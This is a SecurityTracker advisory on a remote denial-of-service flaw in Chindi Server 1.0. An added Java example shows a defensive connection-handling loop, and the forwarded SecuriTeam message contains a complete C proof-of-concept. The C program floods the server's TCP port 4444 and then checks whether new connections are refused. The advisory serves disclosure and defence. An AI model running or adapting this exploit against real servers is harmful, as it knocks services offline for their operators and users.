SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   Chindi
Vendors:   Konradsson, Mikael and Lundstrom, Viktor
Chindi Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006429
SecurityTracker URL:  http://securitytracker.com/id/1006429
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 1 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Chindi Server version 1.0
Description:   A vulnerability was reported in the Chindi Server. A remote user can cause denial of service conditions on the server.

SecuriTeam distributed exploit code for a denial of service vulnerability in the Chindi Server. A remote user can apparently send a large number of characters (approximately 50,000) to the server on TCP port 4444, after which the server stops accepting new connections.

The report credits Luca Ercoli.

Impact:   A remote user can cause the server to stop accepting connections.
Solution:   No solution was available at the time of this entry.
Vendor URL:  come.to/chindi
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.
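
The entry gives the cause as an exception handling error and the effect as a server that stops accepting connections. The following is an added example, not Chindi's code (the report does not show the server's internals): a Java accept loop that caps how much one connection may send and confines any failure to that connection, then checks on loopback that a follow-up connection is still served. The class name, the newline-terminated request format, the 4096-byte cap and the timeout are assumptions; `String.repeat` needs Java 11 or later.

```java
import java.io.*;
import java.net.*;
import java.nio.charset.StandardCharsets;

public class BoundedAcceptLoop {
    static final int MAX_REQUEST_BYTES = 4096; // assumed cap, not a Chindi value
    static final int READ_TIMEOUT_MS = 2000;   // assumed per-read timeout

    // Read one newline-terminated request without buffering past the cap.
    static String readRequest(InputStream in) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        int b;
        while ((b = in.read()) != -1 && b != '\n') {
            if (buf.size() >= MAX_REQUEST_BYTES) throw new IOException("request too large");
            buf.write(b);
        }
        return new String(buf.toByteArray(), StandardCharsets.US_ASCII);
    }

    // Failures stay inside this one connection; nothing propagates to the accept loop.
    static void handle(Socket s) {
        try (Socket c = s) {
            c.setSoTimeout(READ_TIMEOUT_MS);
            String req = readRequest(new BufferedInputStream(c.getInputStream()));
            c.getOutputStream().write(("OK " + req.length() + "\n").getBytes(StandardCharsets.US_ASCII));
        } catch (IOException | RuntimeException e) {
            System.err.println("dropped connection: " + e.getMessage());
        }
    }

    // Loopback test client: returns the server's reply line, or null if it hung up.
    static String probe(int port, String payload) {
        try (Socket c = new Socket(InetAddress.getLoopbackAddress(), port)) {
            c.setSoTimeout(READ_TIMEOUT_MS);
            c.getOutputStream().write(payload.getBytes(StandardCharsets.US_ASCII));
            return new BufferedReader(new InputStreamReader(c.getInputStream(), StandardCharsets.US_ASCII)).readLine();
        } catch (IOException e) { return null; }
    }

    public static void main(String[] args) throws IOException {
        ServerSocket server = new ServerSocket(0, 50, InetAddress.getLoopbackAddress());
        Thread loop = new Thread(() -> {
            while (!server.isClosed())
                try { handle(server.accept()); } catch (IOException e) { /* keep accepting */ }
        });
        loop.setDaemon(true);
        loop.start();
        // Constructed input: about 50,000 characters and no terminator, the size the report cites.
        System.out.println("oversized: " + probe(server.getLocalPort(), "A".repeat(50000)));
        System.out.println("follow-up: " + probe(server.getLocalPort(), "hello\n"));
        server.close();
    }
}
```

The loop handles one connection at a time to keep the example short; a production server would hand each socket to a bounded worker pool with the same cap and catch block.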


 Source Message Contents

Subject:  [EXPL] Chindi DoS Exploit Code


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



  Chindi DoS Exploit Code
------------------------------------------------------------------------


SUMMARY

Chindi is a server/client software package for encrypted file transfer 
written in Java.
A security vulnerability in the product allows remote attackers to cause a 
DoS attack.

DETAILS

Vulnerable systems: 
Chindi Server version 1.0

Exploit code:
/************************************************************
* Chindi server 1.0  Denial of Service
* Proof of Concept by Luca Ercoli  luca.ercoli at inwind.it
* After DoS, server appears to be up, but will not allow
* new connections.                                               *
*************************************************************/

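#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>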


#define PORT    4444
#define DOS     "crash"


int main(int argc, char *argv[]){


int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

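char *host = NULL;


printf ("\nChindi server 1.0 remote DoS\n\n");


if(argc < 2 ) {
                printf ("Usage: %s -t target\n",argv[0]);
                exit(0);
        }


/* "t:" tells getopt that -t takes an argument, so optarg is set */
while((nOpt = getopt(argc, argv, "t:")) != -1) {

        switch(nOpt) {
                        case 't':
                        host = optarg;
                        break;
                        default:exit(0);
                }
        }


/* no -t given: print usage instead of resolving an unset pointer */
if (host == NULL) {
                printf ("Usage: %s -t target\n",argv[0]);
                exit(0);
        }


if ((he = gethostbyname(host)) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }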


server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);


sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);


if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct sockaddr)) == -1)
          {
                  perror("Connect");
                  exit(1);
          }


printf("1. Connected\n");
sleep(1);
printf("2. Sending crash string\n");
sleep(1);
printf("3. Verifing server status: ");
sleep(1);

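for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

close(sockfd);

/* close() invalidated the descriptor, so the status check needs a new socket;
   reusing the old one would make connect() fail and always report a crash */
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct sockaddr)) == -1)
          {
                 printf("Crashed!.\n");
                 exit(1);
          }

else { printf("Server don't crash!\n"); exit(0); }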

}


ADDITIONAL INFORMATION

The information has been provided by luca.ercoli@inwind.it.




Copyright 2019, SecurityGlobal.net LLC